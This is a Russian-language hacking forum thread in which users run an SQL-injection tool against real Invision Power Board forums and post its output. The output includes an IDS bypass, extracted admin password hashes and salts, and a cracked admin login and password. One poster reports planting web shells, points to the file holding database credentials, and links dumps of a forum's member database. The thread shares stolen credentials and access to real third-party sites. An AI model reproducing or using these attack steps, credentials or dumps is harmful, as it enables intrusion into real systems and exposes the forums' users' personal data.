Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
умя такая проблема делаю все норм но какаято ошибка
*[Ссылки могут видеть только зарегистрированные пользователи. ]
/IDS bypass:1
/Cheking sql-injection..
-Forum unvulnerable
/Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+[08.04.2010. 21:50:23]
+Total:1
Z:\usr\local\php5>
Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
Цитата:
Сообщение от Toopoi
умя такая проблема делаю все норм но какаято ошибка
*[Ссылки могут видеть только зарегистрированные пользователи. ]
/IDS bypass:1
/Cheking sql-injection..
-Forum unvulnerable
/Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+[08.04.2010. 21:50:23]
+Total:1
Z:\usr\local\php5>
Там уже стоит IPB 2.3.6
________________
C Жука не выгоните ^^) Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Написал в асю - представься и уточни что с Жука, иначе игнор
Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
я был бы очень признателен если бы вы помогли мне расшифровать
+ Ok, using hash 47afebaef8098a0af34963b813d10535
/ Trying to get the password salt
/
+ Ok, using salt ?T"{A
Спасибо за ранее
Последний раз редактировалось maksline; 09.04.2010 в 12:34.
Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
можете потренироваться, хеши в PasswordPro расшифровывают
Код:
Attack(s):
+ [09.04.2010 20:39:01]
+ http://mmo-itp.ru/forum/
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
+ pass_hash=a1b820aa0f7fcd4a827d8286eddda74e
+ Ok, using hash a1b820aa0f7fcd4a827d8286eddda74e
/ Trying to get the password salt
+ pass_salt=-R]]3
+ Ok, using salt -R]]3
+ Enjoy!
+ [09.04.2010 20:56:14]
+ Total: 188
админ логин: Insane
пасс: yaebashu
залил шеллов в uploads, т.к. нет прав заливать в другие папки
первый шелл через скины: [Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
данные БД находятся в файле conf_global.php
п.с. сразу форум не убивайте тока)
п.с.с вот вся база одного из форумов, который уже удален _http://slil.ru/28934666
а вот отдельно дамп members.sql _http://slil.ru/28934674
кто знает что можно извлечь из базы ФОРУМА?
setfer префиксы хз, можно попробовать в пхп файле найти и заменить все ibf_ на ipb_ и то не факт что там такой префикс)
Script not found это значит что уязвимый код не найден, получить хеш не возможно
upd: [Ссылки могут видеть только зарегистрированные пользователи. ]
админ емайл admin@f1-live.ru
пасс asdfasdf
шеллы:
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
Последний раз редактировалось cavern; 09.04.2010 в 22:34.
Причина: добавлено сообщение